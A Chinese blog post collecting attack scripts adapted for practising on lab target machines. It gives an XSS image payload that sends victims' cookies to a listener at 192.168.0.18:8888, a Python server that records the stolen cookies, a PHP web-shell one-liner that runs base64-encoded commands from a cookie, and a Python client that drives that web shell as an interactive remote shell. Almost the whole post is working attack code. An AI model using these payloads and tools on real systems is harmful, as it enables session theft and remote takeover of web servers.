记录一些打靶机过程中修改的脚本。
<img src=x onerror="this.src=‘http://192.168.0.18:8888/?‘+document.cookie; this.removeAttribute(‘onerror‘);">
#!/usr/bin/env python
# POC for cookie stealing through XSS
# Should work with:
# <script>
#   image = new Image();
#   image.src=‘http://X.X.X.X:8888/?‘+document.cookie;
# </script>
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
from datetime import datetime
class MyHandler(BaseHTTPRequestHandler):
    """Minimal listener that prints every GET request's query string.

    Used in a lab to observe the callback described in the file header: each
    request is reduced to a timestamp, the peer address, the User-Agent header
    and the parsed query parameters, all written to stdout. Nothing is written
    back to the client. The printed values come straight from the remote
    client and are echoed unescaped (terminal escape sequences included), so
    the console this runs in should be treated as untrusted output.
    """

    def do_GET(self):
        """Print one request to stdout; no response body is sent."""
        stamp = datetime.now().strftime("%Y-%m-%d %I:%M %p")
        peer = self.client_address[0]
        # Message-style lookup: yields None rather than raising when absent.
        agent = self.headers['user-agent']
        params = parse_qs(urlparse(self.path).query)

        lines = ["", "%s - %s\t%s" % (stamp, peer, agent), "-------------------" * 6]
        lines.extend(
            "%s\t\t\t%s" % (name.strip(), values) for name, values in params.items()
        )
        for line in lines:
            print(line)

    def log_message(self, format, *args):
        """Suppress BaseHTTPRequestHandler's per-request stderr logging."""
        return
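if __name__ == "__main__":
    # Binds on every interface, not just the lab network; port 8888 matches
    # the beacon in the file header. Constructed outside the try so a ^C
    # during bind cannot leave `server` unbound in the handler below.
    server = HTTPServer(('0.0.0.0', 8888), MyHandler)
    print('Started http server')
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print('^C received, shutting down server')
    finally:
        # server_close() releases the listening socket via HTTPServer's own
        # cleanup; closing server.socket directly skipped that.
        server.server_close()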
原仓库同上
python3 版本，对 Windows 和 Linux 的输出编码做了兼容
例
python cookie.py http://127.0.0.1/cookie_yjh.php
代码
#!/usr/bin/env python
"""
The following code is an alternative for GET and POST methods
as it uses _COOKIE global variable instead.
Should work with:
    <?php system(base64_decode($_COOKIE["param"])); ?>
"""
from urllib.request import build_opener, HTTPHandler
from sys import argv
import base64
def execute(command, agent, debugLevel=0):
    """Send one command to the endpoint named in argv[1] and print the reply.

    The command is base64-encoded and carried in the ``param`` cookie, which
    is what the PHP one-liner in the module docstring reads. On the wire each
    call is a GET with a fixed User-Agent (``agent``) and a Cookie header of
    the form ``param=<base64>``; those two constants are what a proxy or log
    review can key on. The response body is decoded as UTF-8 first and as
    GB18030 when that fails, then printed in red.

    Args:
        command: text to send; it is encoded, never executed locally.
        agent: User-Agent header value.
        debugLevel: passed to HTTPHandler; non-zero dumps the HTTP exchange.
    """
    encoded = base64.b64encode(command.encode()).decode()
    opener = build_opener(HTTPHandler(debuglevel=debugLevel))
    opener.addheaders = [
        ('User-Agent', agent),
        ('Cookie', 'param={0}'.format(encoded)),
    ]
    response = opener.open(argv[1])
    body = response.read()
    try:
        text = body.decode('utf8')
    except UnicodeDecodeError:
        # Fallback for targets whose shell output is in a Chinese codepage.
        text = body.decode('gb18030')
    print('\033[31m' + text.strip() + '\033[0m')
def main():
    """Read lines from stdin in a loop and hand each one to execute().

    The User-Agent is a fixed IE8 / Windows 7 string; because it never
    varies, it is a simple fingerprint for this client in web server logs.
    Typing ``exit`` ends the loop; any other line is sent unchanged.
    """
    print("[+] Debug Level is set to be 0.")
    agent = (
        "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; "
        "WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; "
        ".NET CLR 3.5.30729; .NET CLR 3.0.30729; "
        "Media Center PC 6.0; .NET4.0C; .NET4.0E)"
    )
    while True:
        command = input('shell:$ ')
        if command == 'exit':
            break
        execute(command, agent)
if __name__ == "__main__":
    # Script entry point; the endpoint URL is expected as argv[1] (see execute).
    main()
原文:https://www.cnblogs.com/wuerror/p/14999241.html